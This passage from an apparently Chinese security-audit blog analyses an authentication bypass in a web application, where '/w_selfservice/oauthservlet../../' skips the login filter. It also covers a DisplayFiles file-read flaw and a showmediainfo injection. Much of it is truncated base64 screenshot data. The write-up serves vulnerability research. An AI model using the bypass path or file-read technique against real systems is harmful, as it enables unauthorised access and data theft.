7Mzj1WfnInz6GkOnwoNsdvDwvsXUtJWzYe7u6PbzpnN1i05g/e//g6OvliH13IOlFK4iouYvzafvDwnjkgYX3MHNYfa6OxTw7dLsJ1j9Rfd1q7SQhasySMvz4ktGKKnqZ0LB9voCQ4/nrO4iPlr8sgvcGELheht7uDCwZZhoQg5G5eyprybw7+op0fXeeYstmzzcPHVM9R4DVRmEevvKyX7UhuUct1nSgfsMWndfZyKmuFlp80pZ/W6PLLdJv1tXVzY00R77/B2mcr9IF7isS/R9kv0/hI+c4SqwA3MWzILqmrHvF182GntBIhQmKeYLi9O08IpTUtzQ8RLwKLUJIoty87vb7ST2xnhv44r/C6Dmxc6+Job/vv+CN2JqgZZDp5eY8fRFOa5CkWfYTBvjp17rnHQ9maQnaFxKrc9wj/sN7EBRTPtPFowwjZOG7+/3c7yIcd++s5B5bfrQpAvn0jiTcyeT5YHvF1tI//et5+T5x/lnlUbyXvrFTp1+XOvYXGen7MvHbnkkBqld/PYF+4lo24nu39WiS99HhtuvZeHnwjx3X/cYVFxXCy+YR2nD/6SV4M5zNt0J1ue+G38z/wNe9qjWyiVzbqPf4yS4DF++da5pFRcuz3aRm63G5W/hY8/sBnnyV+x4416+m05lG+8mxueeJLO//l/ONwH9Bzireda8QBlWz7H9dmHeOO1I0TDWBXeC4PHTml9EyiX0jt58KEbcZ58hR07YtSjvYMessnMgZy8XHq6dtLbt5ycbAjmZKO6Orn
在这个例子中，若var6也就是uri是以/w_selfservice/oauthservlet开头的，即执行<code>var3.doFilter(var1, var2);</code>。那么当我访问其他接口。则使用/w_selfservice/oauthservlet../../即可绕过鉴权</p>
<h2 blockindex=6>0x02 漏洞审计</h2>
<p blockindex=7>在此，以最近爆出的DisplayFiles文件读取和showmediainfo注入为例开始审计。</p>
<h3 blockindex=8>DisplayFiles文件读取</h3>
<p blockindex=9>web.xml搜索DisplayFiles，定位到代码：</p>
<p blockindex=10><img src="data:image/png;base64,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
<p blockindex=11><img src="data:image/png;base64,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
可见从前端接受参数filepath，赋值给var3变量，var3经过SafeCode.decode方法，PubFunc.decrypt方法后，得到明文，根据方法名就可以初步猜测是解码和解密操作。后续就很简单了，var3传入File类，赋值给var4,开始获取文件的字节流并输出到响应里面</p>
<h3 blockindex=12>showmediainfo注入</h3>
<p blockindex=13>web.xml搜索showmediainfo，定位到代码：</p>
<p blockindex=14><img src="data:image/png;base64,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
<p blockindex=15><img src="data:image/png;base64,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